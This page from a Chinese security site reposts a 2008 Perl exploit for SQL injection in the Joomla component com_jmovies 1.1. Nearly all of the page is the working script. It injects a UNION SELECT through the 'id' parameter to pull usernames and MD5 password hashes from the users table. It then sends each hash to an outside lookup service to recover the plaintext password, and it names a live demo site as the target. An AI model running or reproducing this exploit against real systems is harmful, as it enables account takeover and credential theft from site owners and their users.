首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit
来源:http://www.disneyrama.com 作者:s3rg3770 发布时间:2008-12-04  
#!/usr/bin/perl -w
# -----------------------------------------------------------
# Joomla Component com_jmovies 1.1 (id) SQL Injection Exploit
# by s3rg3770 with athos :)
# demo http://www.disneyrama.com
# -----------------------------------------------------------
# Note: In lulz we trust :O
# -----------------------------------------------------------

use strict;
use LWP::UserAgent;
use LWP::Simple;


my $host = shift;
my $myid = shift or &help;

my $path = "/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+".
           "union+select+1,concat(0x215F,username,0x3a,password,0x215F)+".
           "from+jos_users+where+id=${myid}--";

my $http = new LWP::UserAgent(
                               agent   => 'Mozilla/4.5 [en] (Win95; U)',
                               timeout => '5',
                             ); 


my $response = $http->get($host.$path);

if($response->content =~ /!_(.+?)!_/i)
{
     print STDOUT "Hash MD5: $1\n";
     print STDOUT "Password: ".search_md5($1)."\n";
     exit;
}
else
{
     print STDOUT "Exploit Failed!\n";
     exit;
}



sub search_md5
{
     my $hash = shift @_;
     my $cont = undef;

     $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
       
     if(length($hash) < 32 && !is_error($cont))
     {
          return $cont;
     }
}  


sub help
{
     print STDOUT "Usage: perl $0 [host] [user ID]\n";
     print STDOUT "by athos - staker[at]hotmail[dot]it\n";
     exit;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ClamAV < 0.94.2 (JPG File) Sta
·RadAsm <= 2.2.1.4 (.RAP File)
·Cain & Abel 4.9.23 (rdp file)
·Check New 4.52 (findoffice.php
·ccTiddly 1.7.4 (cct_base) Mult
·CPanel version 11.x privilege
·EiD <= 0.92 Malformed PE File
·serv-u7 local exp (php)
·NULL FTP Server 1.1.0.7 SITE P
·CMS MAXSITE Component Guestboo
·Visagesoft eXPert PDF EditorX
·DesignWorks Professional 4.3.1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved